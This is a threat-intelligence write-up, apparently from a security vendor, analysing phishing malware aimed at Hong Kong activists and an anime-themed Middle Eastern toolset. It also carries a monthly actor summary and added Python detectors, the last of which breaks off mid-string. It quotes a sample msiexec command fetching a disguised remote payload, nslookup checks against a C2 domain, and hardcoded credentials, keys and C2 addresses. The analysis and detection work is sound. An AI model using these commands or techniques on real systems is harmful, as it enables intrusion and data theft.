Threat Actor Targeting Hong Kong Pro-Democracy Figures

Introduction

At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting feedback on his supposed thesis, which included recommendations on how to end the Hong Kong unrest. The email contained a link to a ZIP file hosted on Google Drive.

The contents of FYI.zip downloaded from the Google Drive link

The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.

The third file, masquerading as a Nikkei Asian Review document, is actually an LNK shortcut file with a double extension. When the archive is viewed through archiving software, the double extension “.rtf.lnk” is shown correctly. If the file is extracted and viewed through Windows Explorer, however, the operating system hides the .lnk extension by default, so the file appears to be an RTF document.

Analysis of the LNK file shows running it will execute msiexec.exe to download and run a remote MSI file

The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin (living-off-the-land binary) to download and run remote MSI files, even when they carry a .png extension. In this case, the MSI file is downloaded from a GitHub repository and account which were created on October 10.
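As an added example (not code from the original post), the following Python triage helpers cover the two delivery tricks described above: an archive member hiding a .lnk behind a document-looking double extension, and msiexec.exe being pointed at a remote package that does not carry an .msi extension. The GitHub URL and the process-creation events are constructed samples, not the actual URL from the campaign.

```python
import os
import re
import shlex
from typing import Dict, List, Optional
from urllib.parse import urlparse

DOCUMENT_EXTENSIONS = {".rtf", ".doc", ".docx", ".pdf", ".txt", ".xls", ".xlsx"}
EXECUTABLE_EXTENSIONS = {".lnk", ".exe", ".scr", ".js", ".vbs", ".hta"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def check_archive_member(name: str) -> Optional[str]:
    """Return a reason string when an archive member looks like a disguised
    executable (e.g. 'article.rtf.lnk'), or None when it looks harmless."""
    base = os.path.basename(name.replace("\\", "/"))
    root, last = os.path.splitext(base)
    _, inner = os.path.splitext(root)
    last, inner = last.lower(), inner.lower()
    if last in EXECUTABLE_EXTENSIONS and inner in DOCUMENT_EXTENSIONS:
        # Explorer hides the final .lnk, so the user only sees the inner extension.
        return f"double extension {inner}{last}: Explorer hides {last} by default"
    if last == ".lnk":
        return "shortcut file inside an archive"
    return None


def check_msiexec_commandline(image: str, command_line: str) -> Optional[Dict]:
    """Flag msiexec.exe invocations that install from a remote URL.
    Returns None for any other image, or when no URL argument is present."""
    if os.path.basename(image.replace("\\", "/")).lower() != "msiexec.exe":
        return None
    match = URL_RE.search(command_line)
    if not match:
        return None
    url = match.group(0).strip("\"'")
    parsed = urlparse(url)
    path_ext = os.path.splitext(parsed.path)[1].lower()
    try:
        tokens = [t.lower() for t in shlex.split(command_line, posix=False)]
    except ValueError:  # unbalanced quotes; fall back to a plain split
        tokens = command_line.lower().split()
    quiet = any(t in ("/q", "/qn", "/quiet", "-q", "-qn") for t in tokens)
    return {
        "url": url,
        "host": parsed.hostname,
        "remote_install": True,
        # An MSI served under another extension (here .png) is the trick from the post.
        "non_msi_extension": path_ext != ".msi",
        "quiet": quiet,
        "severity": "high" if (path_ext != ".msi" or quiet) else "medium",
    }


# Constructed sample telemetry (not real logs): image path and command line as a
# Sysmon/EDR process-creation event would record them. EXAMPLE-ACCOUNT and
# EXAMPLE-REPO are placeholders, not the repository used in the campaign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /q /i https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/master/siHost64.png"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\user\Downloads\7zip.msi"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe https://example.com/x.png"},
]


def scan_events(events: List[Dict[str, str]]) -> List[Dict]:
    """Run the msiexec check over a batch of process-creation events."""
    alerts = []
    for ev in events:
        finding = check_msiexec_commandline(ev["Image"], ev["CommandLine"])
        if finding:
            alerts.append(finding)
    return alerts


if __name__ == "__main__":
    for member in ("FYI/NAR article.rtf.lnk", "FYI/Freedom House - Hong Kong.pdf"):
        print(member, "->", check_archive_member(member))
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```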

A snapshot of the GitHub repository on October 29

siHost64

The MSI file, “siHost64.png”, was created using a registered or cracked copy of EXEMSI. Running it drops and runs “siHost64.exe” in the %APPDATA% folder. This executable is a PyInstaller executable with over a thousand files inside it, but the important one is the compiled Python script “siHost64”.

Unpacking the PyInstaller executable shows the real files, some of which cannot be seen when performing dynamic analysis

By restoring the first eight missing bytes of “siHost64”, which is typically required for such PyInstaller-packaged scripts, we were able to decompile the compiled Python script and analyze the functionality of this malware:

  • Uses the Python requests library to call the Dropbox API, using Dropbox as an HTTPS C2 server
  • Uses the system proxy for communications, if one is configured
  • Adds itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run under the value name “siHost64”. On October 31, a new version of the malware changed the value name to “Dropbox Update Setup”.
  • Encrypts uploaded files with AES in CBC mode using the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
  • Checks in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged-in user
  • Checks for files from the C2 server containing encrypted arbitrary commands to be run, executes each command, and creates a new encrypted file containing the results of the executed command.

Example of the malware using the Dropbox API to check in

Based on the check-in information from infected machines, it appears that, besides the target described at the start, there is a single other infected Hong Kong victim of interest to this threat actor connecting to the Dropbox app. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.

Besides those exfiltrated documents, the C2 server also appeared to host next-stage malware, such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable which appears to be for upgrading a previous Windows version to Windows 10, and “GetCurrentDeploy.dll” is likely the name of the DLL which it side-loads. The earliest version of “GetCurrentRollback.exe” we could find dates from 2016 and the latest from November 2019, which means that, at first glance, all versions might be exploitable by DLL side-loading.

A version of GetCurrentRollback.exe signed on November 13, 2019 is still vulnerable to DLL Sideloading

Conclusion

Based on the victim profile and the exfiltrated files, it appears that one of the intelligence requirements of the threat actor is to monitor people with relations to the Hong Kong protests, targeting either them or the people around them. There are multiple possible reasons for this requirement, the most likely being to understand the inner thoughts of the pro-democracy movement, or to support or undermine the movement behind the scenes.

Using Dropbox and other legitimate services such as Google Drive and GitHub throughout the attack life cycle is not a new concept for threat actors, as it allows them to easily bypass network detection. To counter this threat, enterprises or teams within enterprises nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users, who may also be targeted by state-sponsored threat actors, rarely have this luxury.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1192 Spearphishing Link

Execution

T1204 User Execution
T1218 Signed Binary Proxy Execution
T1064 Scripting

Persistence

T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1218 Signed Binary Proxy Execution
T1102 Web Service

Discovery

T1083 File and Directory Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery

Collection

T1005 Data from Local System

Command and Control

T1043 Commonly Used Port
T1132 Data Encoding
T1071 Standard Application Layer Protocol
T1032 Standard Cryptographic Protocol
T1102 Web Service

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, and SectorA07, were found among SectorA hacking groups this September.

The parallel requirements of the hacking activities of the SectorA hacking groups, which continue to date, are both to collect high-quality information related to government activities, such as political and diplomatic activities related to South Korea or to SectorA relief organizations, and to profit illegally from crimes around the world. These purposes have been pursued for a long time, and as they are strategic, they are expected to continue unchanged for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were related to collecting high-level information such as political and diplomatic activities related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria, and used malware in the form of files for the Hangul word processor software, which is widely used by South Korean government agencies.

SectorA05 group activity was found in the United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The hacking technique used by the group was spear phishing emails delivering malware in the form of Microsoft Word files to the target. The lure documents had topics related to SectorA’s economic sanctions, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. During that time, the attacker used a Windows executable with a file name associated with an MOU contract with the Department of Defense. The file was disguised using the Microsoft Word icon.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing with document files that exploit N-day vulnerabilities in Microsoft Office as attachments. This method of intrusion is common for them when targeting developing countries, such as those in Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

Since the hacking activities of the SectorB groups discovered in September are mostly concentrated in Southeast Asia, they appear to be closely related to the political and diplomatic activities of the SectorB government. Thus, the hacking activity of the SectorB groups is expected to continue, especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. The SectorC08 group used to hack only in Europe in the past, but this is the first time that hacking activity has been found in East Asia (including China and South Korea), and additional analysis of their purpose is required. Although the SectorC groups, where hacking activity was found, use different hacking techniques, their spear phishing emails display common characteristics.

The SectorC01 group attaches Microsoft Word document malware to spear phishing emails and uses remote template injection techniques to deliver malware in Microsoft Word files containing macro scripts to their targets.

Similar to past hacking cases, the SectorC08 group maintains their traditional hacking approach using spear phishing emails with 7ZipSPX compressed files attached. However, we also confirmed that their hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have many varied attack techniques because of their long history, and they are likely to continue a similar form of hacking in the future, as they continue to do so in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries which are political rivals with the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), and other hacking targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to previous cases – sending a Microsoft Word file with a malicious macro to the target as an attachment in a spear phishing email. In addition to these techniques, the SectorD05 group has launched attacks against researchers from the United States, the Middle East, and France who focus on academic research on SectorD, and has performed phishing attacks targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofed sites disguised as user login pages, in order to steal the credentials entered by the targeted individuals.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05, were found among SectorE hacking groups this September. The activities of the SectorE hacking groups were discovered in September in Europe (including Belgium, Portugal, the United Kingdom, France and Russia), Southeast Asia (including Singapore, Sri Lanka, the Philippines and Thailand), East Asia (including Taiwan and China), North America (including the United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but recently the range of geographical hacking activities of these groups is gradually widening.

The basic hacking technique of the SectorE groups is to use attached documents in spear phishing emails, which could be Microsoft Office documents with malicious macro functionality or previously known code execution vulnerabilities, or files for the InPage software that is used frequently only in certain regions. They hosted malware in the form of Microsoft Word documents containing macro scripts on a specific domain. The document performs a remote template injection, querying the server to download the additional macro template from the attacker’s domain.

As the SectorE Group geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques. In past cases, whenever the geographic radius of hacking groups’ targets expanded, so did their hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The hacking activity found in September included malware similar to previously found malware: a RAR compressed file consisting of an executable disguised with a Microsoft Word icon and a malicious DLL file, in line with their existing technique. The SectorF01 group uses the DLL side-loading technique to carry out the attack. When the executable disguised as the Microsoft Word program is executed, the DLL in the same folder is loaded and executed.

As there have been many past cases where their hacking activity was discovered in regions including SectorF itself, these may be hacking activities aimed at people who oppose the political activities of the SectorF government. However, as hacking activities are also conducted for the purpose of economic development in SectorF, additional analysis needs to be done while tracking the areas and targets of their hacking activity.

7. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September, but this is relatively infrequent unlike other government supported hacking groups.

SectorH01’s hacking activity was discovered in September in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware in Microsoft Excel files containing macro scripts through spear phishing emails. The macro script executes JavaScript code hosted on Pastebin, which uses PowerShell to transfer an injector and the DLL files to be injected into the infected system, and then registers autorun entries for persistence.

The SectorH01 group’s increased and broadening hacking activity highlights the dynamics of competition between SectorE and SectorH. It is important to pay close attention to the future competition between the two countries, and to whether this increased hacking activity will affect the international situation in the future.

8. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 groups was discovered this September.

Unlike most other government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and the United States. They sent the target a spear phishing email containing a link to download a JavaScript backdoor. When the malware is installed, it resides in memory, and when the victim accesses an online payment page, skimming code is injected into the HTML Document Object Model to collect the payment information that the user types in.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

The group has for a while been using spam emails with Office-themed Microsoft Excel or Word documents attached, installing malware on the infected system which transmits the information collected from it to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, the Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachments in the form of LNK shortcut files.

SectorJ09 group activity was found in Italy. They launched an attack on e-commerce service providers, injecting JavaScript into the payment page of a hotel’s website that uses a particular e-commerce service, in order to load a remote script. Only when the page is accessed from a mobile device is a skimmer script loaded to steal credit card information.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorD01: When anime goes cyber

Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East, but which we have also observed targeting North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign, named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.

Sakabota

When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.

The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.

Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, irrespective of the version numbers.

Name: Description

dsquery (v5.2.3790.3959): Trusted Microsoft command-line utility for querying Active Directory Services.

k: Most of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources.
Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.

nircmd (v2.81): 64-bit NirCmd command-line utility from NirSoft.

plink (v0.62): Command-line PuTTY.

PowerCat_DNS_small: A shortened version of the open-source powercat PowerShell utility.

rar (v4.20): 64-bit command-line WinRAR.

Local: Trusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.

PSEXEC (v2.2): Signed and trusted Sysinternals/Microsoft PsExec utility. This is an old version of PsExec which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.

Shell: Custom Shell.aspx web shell which uses md5 hashing to check the password given in the “id” parameter of the POST request.
There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.

svhost: The executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware.
It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.

Diezen: Another backdoor with the picture of a samurai used by the attacker, which connects to pasta58[.]com, the same C2 server as Sakabota.

Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above but also with Mimikatz, which we believe was not embedded because it would make Sakabota more likely to be detected. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.

Sakabota in GUI mode contains a wrapper for Mimikatz, which is not embedded in the malware.

Diezen

Diezen is a simple backdoor which can be dropped by Sakabota and is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class, primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.

By the time Diezen reached version 0.6, it had switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org, and checking whether an alternative autostart location – the Start Menu – was available besides its normal use of scheduled tasks. The public IP check was later carried over to the Hisoka malware as well, alongside the implementation of the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.

Gon

Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have originally been branched off from the Sakabota malware. In Gon’s case, not only are the embedded resources dsquery and plink present, but a large part of the non-GUI code is exactly the same, and in fact still has remnants of “Sakabota” in one of its strings.

Just as the various versions of Sakabota have implemented functionality which was in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list of slightly over 1000 passwords, mainly variations around digits, the word “password”, and the word “kuwait”. These passwords are used for brute forcing from the tool.

EYE

EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.

Ascii art from EYE using Japanese kaomoji. The square box ロ is actually the Japanese kana character “ro”.

In fact, this automatic clearing of tracks upon disconnection is not a capability unique to the EYE malware, as the exact same function exists in Sakabota. It hooks the .NET event SystemEvents.SessionSwitch so that, if the attacker is disconnected unexpectedly due to a new user logon, it closes all processes created after EYE was opened and deletes files and registry keys related to attacker activity: recently accessed files, both automatic and custom jump lists (first introduced in Windows 7), remote desktop history, search terms, autocomplete, and Start Menu run history. It then closes and deletes itself.

Hisoka and Netero

Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.

Running Hisoka 0.8 with the argument “66” creates a “Help.txt” file in the same folder, containing instructions on how to use and interact with Hisoka from both the victim’s and the attacker’s machine. It also contains functionality to query Active Directory via LDAP, which is likely meant to take over the role of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving that even threat actors have joined the hype.

Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.

For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36”, corresponding to Chrome version 73, which was released on March 12, 2019.

For its DNS C2, it has an unused feature to perform an nslookup.exe check against hisoka[.]<C2_Address> in order to check its status, which may be useful for checking against later versions we have not seen. Example commands for performing its status check are:

  • nslookup.exe -type="A" hisoka[.]microsofte-update[.]com 8.8.8.8
  • nslookup.exe -type="TXT" hisoka[.]microsofte-update[.]com 8.8.8.8

Hisoka v0.8

On the other hand, the Netero malware is a helper utility and loader built for Hisoka, and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but by modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka: various registry values under HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.

The attacker commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configuration, including the kind of C2 server to use, is loaded in the same way and checked constantly, with the result of any command being returned in another registry value. In this way, the attacker is able to interact constantly with Netero purely via the registry and no longer requires a GUI or CLI. Since every command written to the registry has to be XOR-ed and Base64 encoded, the attacker is presumably using another wrapper program for this interaction.
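As an added example (not code from the original post or the malware), a Python decoder for registry values exported from the Hisoka/Netero key, applying the XOR 0x53 then Base64 transform described above, plus a single-byte key recovery for samples that may change the key. The exported values are constructed here; the "ENGINE" value name is hypothetical, as the report only names CM.

```python
import base64
import binascii
from typing import Dict, List, Optional

XOR_KEY = 0x53  # single-byte key named in the analysis above


def decode_registry_value(stored: bytes) -> Optional[bytes]:
    """Reverse the Netero/Hisoka registry obfuscation: XOR every byte with 0x53,
    then Base64-decode. Returns None when the result is not valid Base64, which
    usually means the value was not produced by this scheme (or uses another key)."""
    unxored = bytes(b ^ XOR_KEY for b in stored)
    try:
        return base64.b64decode(unxored, validate=True)
    except (binascii.Error, ValueError):
        return None


def encode_registry_value(plain: bytes) -> bytes:
    """Inverse transform, used here only to construct sample values."""
    return bytes(b ^ XOR_KEY for b in base64.b64encode(plain))


def triage_hisoka_key(values: Dict[str, bytes]) -> Dict[str, Optional[str]]:
    """Decode every value exported from HKCU\\EUDC\\313\\hisoka_v2 (or \\hisoka).
    Keys are value names (e.g. "CM" for the command); results are UTF-8 text,
    or None when the value did not decode under this scheme."""
    out: Dict[str, Optional[str]] = {}
    for name, raw in values.items():
        decoded = decode_registry_value(raw)
        out[name] = decoded.decode("utf-8", errors="replace") if decoded is not None else None
    return out


def recover_xor_key(stored: bytes) -> List[int]:
    """Try every single-byte key and return those under which the value becomes
    valid Base64 that decodes to printable ASCII. Handy if a later sample swaps
    0x53 for another constant; expect a short candidate list, not one answer."""
    hits = []
    for key in range(256):
        candidate = bytes(b ^ key for b in stored)
        try:
            plain = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
        if plain and all(32 <= c < 127 for c in plain):
            hits.append(key)
    return hits


# Constructed sample export of the registry key (not from a real host): the
# CM command value, a hypothetical ENGINE value, and one value that was never
# encoded and should therefore fail to decode.
SAMPLE_KEY_EXPORT: Dict[str, bytes] = {
    "CM": encode_registry_value(b"whoami"),
    "ENGINE": encode_registry_value(b"dns"),
    "Unrelated": b"Some unrelated REG_SZ value",
}


if __name__ == "__main__":
    for name, text in triage_hisoka_key(SAMPLE_KEY_EXPORT).items():
        print(f"{name}: {text!r}")
    print("candidate keys for CM:", [hex(k) for k in recover_xor_key(SAMPLE_KEY_EXPORT["CM"])])
```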

The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS (Microsoft Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent of how it interacts with the attacker via the registry.

Netero shows Hisoka’s output as it is just a helper utility

Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen were compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, this shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware, and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware which interacts via command line or registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PSEXEC.

Conclusion

Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.

Also, since SectorD01 was first discovered in 2016, they have had a penchant for using DNS in their various malware for C2 communications, even up to recently. One easy way to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen whether the other teams of SectorD01 will take up EWS as a C2 protocol as well.
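As an added example (not code from the original post), a small Python analyzer that applies the DNS monitoring suggested above to the kind of traffic the Hisoka DNS C2 and its nslookup TXT status check would generate. The log lines are constructed, the field layout is an assumption modelled on Sysmon Event ID 22 with a query-type field added, and c2-domain.example is a placeholder, not an indicator from the report.

```python
import os
import re
from collections import defaultdict
from typing import Dict, List

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) "
                     r"qtype=(?P<qtype>\S+) qname=(?P<qname>\S+)$")
FANOUT_THRESHOLD = 5           # distinct names under one domain from one host
DNS_TOOLS = {"nslookup.exe", "dig.exe"}


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed-format record; process paths are assumed space-free."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable line: {line!r}")
    return m.groupdict()


def registered_domain(qname: str) -> str:
    # Simplification: the last two labels. A real deployment would consult the
    # Public Suffix List so that names under e.g. co.uk are grouped correctly.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def analyze_dns_log(text: str) -> List[Dict[str, str]]:
    """Two detections over DNS query records:
    1. TXT lookups from a binary under a user profile or from a lookup tool.
       Workstations rarely need TXT records; Hisoka's nslookup status check
       and a TXT-based C2 channel both look like this.
    2. Many distinct names under one registered domain from one host, the
       classic signal of data being carried in DNS labels."""
    alerts: List[Dict[str, str]] = []
    seen = defaultdict(set)  # (host, registered domain) -> distinct query names
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        proc = rec["proc"].replace("\\", "/")
        proc_name = os.path.basename(proc).lower()
        domain = registered_domain(rec["qname"])
        if rec["qtype"].upper() == "TXT" and (
                "/users/" in proc.lower() or proc_name in DNS_TOOLS):
            alerts.append({"rule": "txt_query_from_unexpected_process",
                           "host": rec["host"], "proc": rec["proc"],
                           "qname": rec["qname"]})
        seen[(rec["host"], domain)].add(rec["qname"].lower())
    for (host, domain), names in seen.items():
        if len(names) >= FANOUT_THRESHOLD:
            alerts.append({"rule": "subdomain_fanout", "host": host, "proc": "",
                           "qname": domain, "distinct": str(len(names))})
    return alerts


# Constructed sample log (not real telemetry): one benign lookup, the Hisoka-style
# status check via nslookup.exe, and a beaconing loader using changing subdomains.
SAMPLE_LOG = r"""
2019-11-13T10:00:01Z host=WS01 proc=C:\Windows\System32\svchost.exe qtype=A qname=update.microsoft.com
2019-11-13T10:00:02Z host=WS01 proc=C:\Users\u\AppData\Roaming\netero.exe qtype=TXT qname=hisoka.c2-domain.example
2019-11-13T10:00:05Z host=WS01 proc=C:\Windows\System32\nslookup.exe qtype=TXT qname=hisoka.c2-domain.example
2019-11-13T10:00:06Z host=WS01 proc=C:\Users\u\AppData\Roaming\netero.exe qtype=A qname=a1b2c3.c2-domain.example
2019-11-13T10:00:08Z host=WS01 proc=C:\Users\u\AppData\Roaming\netero.exe qtype=A qname=d4e5f6.c2-domain.example
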